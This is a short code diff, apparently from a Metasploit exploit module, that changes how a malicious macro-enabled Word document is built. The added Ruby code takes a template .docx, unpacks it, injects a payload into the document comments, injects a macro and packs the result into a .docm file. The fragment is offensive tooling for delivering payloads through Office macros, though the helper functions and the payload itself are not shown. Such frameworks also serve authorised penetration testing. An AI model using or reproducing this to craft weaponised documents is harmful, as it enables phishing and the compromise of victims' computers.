+    if datastore['CUSTOMTEMPLATE']
+      datastore['CUSTOMTEMPLATE']
+    else
+      File.join(macro_resource_directory, 'template.docx')
+    end
+  end

  def exploit
-    print_status('Generating our docm file...')
-    path  = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
-    docm = package_docm(path)
+    template_path = get_template_path
+    print_status("Using template: #{template_path}")
+    @docx = unpack_docx(template_path)
+
+    print_status('Injecting payload in document comments')
+    inject_payload
+
+    print_status('Injecting macro and other required files in document')
+    inject_macro
+
+    print_status("Finalizing docm: #{datastore['FILENAME']}")
+    docm = pack_docm
    file_create(docm)
    super
  end